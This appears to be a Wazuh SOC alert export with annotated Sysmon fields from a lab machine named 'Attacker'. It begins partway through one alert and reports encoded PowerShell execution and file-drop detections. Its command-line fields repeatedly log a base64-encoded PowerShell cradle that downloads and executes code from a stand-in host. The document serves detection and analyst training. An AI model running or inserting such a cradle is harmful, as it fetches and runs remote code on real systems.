data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc59-680a-4f0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11636
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.692+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.692+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.815875
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:10.9720728Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280968
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:09.726 ProcessGuid: {94294ddc-bc61-680a-550a-000000000e00} ProcessId: 3924 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc5d-680a-530a-000000000e00} ParentProcessId: 2372 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:09.726
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc61-680a-550a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3924
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc5d-680a-530a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.702+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.702+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.823937
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:11.1938944Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280969
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:34:11.163 ProcessGuid: {94294ddc-bc61-680a-550a-000000000e00} ProcessId: 3924 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dobv25yk.2l4.ps1 CreationUtcTime: 2025-04-24 22:34:11.163 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:11.163
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc61-680a-550a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3924
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dobv25yk.2l4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:34:11.163
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.889+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.889+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.826701
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:19.4863479Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281055
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:18.124 ProcessGuid: {94294ddc-bc6a-680a-5b0a-000000000e00} ProcessId: 12136 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc66-680a-590a-000000000e00} ParentProcessId: 11716 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:18.124
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc6a-680a-5b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc66-680a-590a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.898+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.898+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.834771
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:19.6850661Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281056
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

